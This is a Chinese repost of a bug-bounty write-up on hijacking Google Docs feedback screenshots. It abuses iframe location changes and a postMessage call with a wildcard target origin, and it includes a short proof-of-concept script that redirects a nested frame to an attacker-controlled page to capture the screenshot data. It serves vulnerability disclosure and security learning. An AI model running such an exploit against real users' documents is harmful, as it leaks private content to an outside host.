详解我如何劫持 Google Docs 截屏并获得奖金

2024-01-12 07:48

本文主要是介绍详解我如何劫持 Google Docs 截屏并获得奖金,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 聚焦源代码安全,网罗国内外最新资讯!

我可以利用 postmessage 配置不当和一个浏览器行为劫持任意文档的 Google Docs 截屏。

谷歌的多数产品中拥有一个名为 “Send Feedback” 的功能。如这个功能的名称所示,当用户遇到问题时,该功能有助于谷歌获得用户反馈。该功能还提供了一种选项,可为截屏附加一个简短的问题说明。

由于在多数谷歌站点中都是一个常见的功能,谷歌在 https://www.google.com 中部署了该功能,并且通过iFrame 集成到其它域名中。

工作原理

我们假设使用 Google Docs (https://docs.google.com/document) 提交反馈的流程:首先,导航到 Help--> Send Feedback,之后你会看到一个 iFrame 弹出并魔术般地加载你正在处理的文档截屏。由于该 iframe 的来源 (www.google.com) 不同于 Google Docs (docs.google.com),因此要成功地渲染该截屏,肯定存在某种跨来源通信方法。这时候,PostMessage 就派上用场了!工作流基本应该是:Google Docs 通过 postmessage  将每个像素的 RGB 值发送给主 iframe (www.google.com)中,之后将这些 RGB 值通过 postmessage 发送给它的 iframe (feedback.googleusercontent.com),之后从那些像素中渲染图像并将 base64 编码的数据-URI 发送回主 iFrame。

该进程结束后,我们必须为该反馈写一个声明,并点击,将带有图像 (data-uri) 的说明通过 postmessage 发送给 https://www.google.com (提交 Feedback)。

猎洞

理解了这个功能后,我最初的想法是从沙箱域名 feedbackgoogleusercontent.com 中找到一个 XSS。利用该 XSS,我可以劫持像素的 RGB 值,渲染该图像并窃取截屏。我之所以很确认我将发现一个 XSS,是因为它是一个沙箱域名。但事实并非如此。尝试数天之后,我向 S1r1us 求助。我们花了5天的时间尝试寻找 XSS,但均以失败告终,遂放弃。一周后,我发现了 fieldescriptor 发的视频。

观看视频后,我学到了一种新技术:你可以更改位于跨来源域名中 iFrame 的位置(前提是该域名缺乏 X-Frame-Header)。例如,如果 abc.com 将 efg.com 作为iframe 且 abc.com 并不拥有 X-Frame 标头,则我可以使用 frames.location 将 efg.com 更改为 evil.com 跨来源。

现在,我正在思考利用该行为的方法。如果我尝试将 feedback 功能中的这些 iframe 替换为我的域名会发生什么?它会将postmessage 发送给我吗?我决定尝试一下。我尝试用 geekycat.in 替换 feedback.googleusercontent.com 域名,但失败了。

虽然将数据发送给 feedback.googleusercontent.com,但发送的内容和下面的差不多:

windowRef.postmessage("<Data>","https://feedback.googleusercontent.com");

因此,即使我更改了 iframe 的位置,由于 postmessage 配置中的匹配不当问题,数据也不会发送到我的域名中。绝望之下,我尝试将 (Submit Feedback www,google.com) iframe 更改到我的域名中,这次成功了!为什么?

关于提交反馈的最后一条 postmessage 的配置类似于 windowRef.postmessage (“<Data>”,”*”);由于不存在域名检查,该浏览器愉快地将数据发送到我的域名,使我能够捕获并劫持该截屏。

且慢!我说过父域名不该具有 X-Frame 标头,但我是怎么实现的?幸运的是,Google Docs 并未设置该标头。是的!它仍然还未设置。在向谷歌提交点击劫持报告之前,会注意到站点部署着一些防止点击劫持的其它保护措施,在嵌入 iFrame 中时多数选项被禁用。

这种行为见如下 Liveoverflow 视频。

Exploit

拼在一起,就是:

<html><iframe src="https://docs.google.com/document/ID" /><script>//pseudo codesetTimeout(function(){ exp(); }, 6000);function exp(){setInterval(function(){ window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";}, 100);}
</script>
</html>

在将 setTimeout 设置为6秒后再调用该函数是为了提供 iFrame 加载的时间。另外一个问题是,只有在用户明确点击 “发送反馈“ 选项时才会创建该 iFrame。因此我们必须每隔100毫秒就更改一次 iFrame 的位置,即使它并不存在也是如此,以确保当该框架被创建时就会被劫持。

PoC

推荐阅读

谷歌发布 V8 Exploit 漏洞奖励计划,奖金加倍

谷歌发布 XS-Leaks 漏洞知识库

对 *.google.com/* 产品进行大规模的 CSRFing 研究,意外获得3万美元奖金

原文链接

https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/

题图:Pixabay License

本文由奇安信代码卫士编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的

产品线。

    觉得不错,就点个 “在看” 或 "赞” 吧~

这篇关于详解我如何劫持 Google Docs 截屏并获得奖金的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/597231

相关文章

MySQL数据库双机热备的配置方法详解

《MySQL数据库双机热备的配置方法详解》在企业级应用中,数据库的高可用性和数据的安全性是至关重要的,MySQL作为最流行的开源关系型数据库管理系统之一,提供了多种方式来实现高可用性,其中双机热备(M... 目录1. 环境准备1.1 安装mysql1.2 配置MySQL1.2.1 主服务器配置1.2.2 从

Linux kill正在执行的后台任务 kill进程组使用详解

《Linuxkill正在执行的后台任务kill进程组使用详解》文章介绍了两个脚本的功能和区别,以及执行这些脚本时遇到的进程管理问题,通过查看进程树、使用`kill`命令和`lsof`命令,分析了子... 目录零. 用到的命令一. 待执行的脚本二. 执行含子进程的脚本,并kill2.1 进程查看2.2 遇到的

MyBatis常用XML语法详解

《MyBatis常用XML语法详解》文章介绍了MyBatis常用XML语法,包括结果映射、查询语句、插入语句、更新语句、删除语句、动态SQL标签以及ehcache.xml文件的使用,感兴趣的朋友跟随小... 目录1、定义结果映射2、查询语句3、插入语句4、更新语句5、删除语句6、动态 SQL 标签7、ehc

详解SpringBoot+Ehcache使用示例

《详解SpringBoot+Ehcache使用示例》本文介绍了SpringBoot中配置Ehcache、自定义get/set方式,并实际使用缓存的过程,文中通过示例代码介绍的非常详细,对大家的学习或者... 目录摘要概念内存与磁盘持久化存储:配置灵活性:编码示例引入依赖:配置ehcache.XML文件:配置

从基础到高级详解Go语言中错误处理的实践指南

《从基础到高级详解Go语言中错误处理的实践指南》Go语言采用了一种独特而明确的错误处理哲学,与其他主流编程语言形成鲜明对比,本文将为大家详细介绍Go语言中错误处理详细方法,希望对大家有所帮助... 目录1 Go 错误处理哲学与核心机制1.1 错误接口设计1.2 错误与异常的区别2 错误创建与检查2.1 基础

k8s按需创建PV和使用PVC详解

《k8s按需创建PV和使用PVC详解》Kubernetes中,PV和PVC用于管理持久存储,StorageClass实现动态PV分配,PVC声明存储需求并绑定PV,通过kubectl验证状态,注意回收... 目录1.按需创建 PV(使用 StorageClass)创建 StorageClass2.创建 PV

Python版本信息获取方法详解与实战

《Python版本信息获取方法详解与实战》在Python开发中,获取Python版本号是调试、兼容性检查和版本控制的重要基础操作,本文详细介绍了如何使用sys和platform模块获取Python的主... 目录1. python版本号获取基础2. 使用sys模块获取版本信息2.1 sys模块概述2.1.1

一文详解Python如何开发游戏

《一文详解Python如何开发游戏》Python是一种非常流行的编程语言,也可以用来开发游戏模组,:本文主要介绍Python如何开发游戏的相关资料,文中通过代码介绍的非常详细,需要的朋友可以参考下... 目录一、python简介二、Python 开发 2D 游戏的优劣势优势缺点三、Python 开发 3D

Redis 基本数据类型和使用详解

《Redis基本数据类型和使用详解》String是Redis最基本的数据类型,一个键对应一个值,它的功能十分强大,可以存储字符串、整数、浮点数等多种数据格式,本文给大家介绍Redis基本数据类型和... 目录一、Redis 入门介绍二、Redis 的五大基本数据类型2.1 String 类型2.2 Hash

Java中的.close()举例详解

《Java中的.close()举例详解》.close()方法只适用于通过window.open()打开的弹出窗口,对于浏览器的主窗口,如果没有得到用户允许是不能关闭的,:本文主要介绍Java中的.... 目录当你遇到以下三种情况时,一定要记得使用 .close():用法作用举例如何判断代码中的 input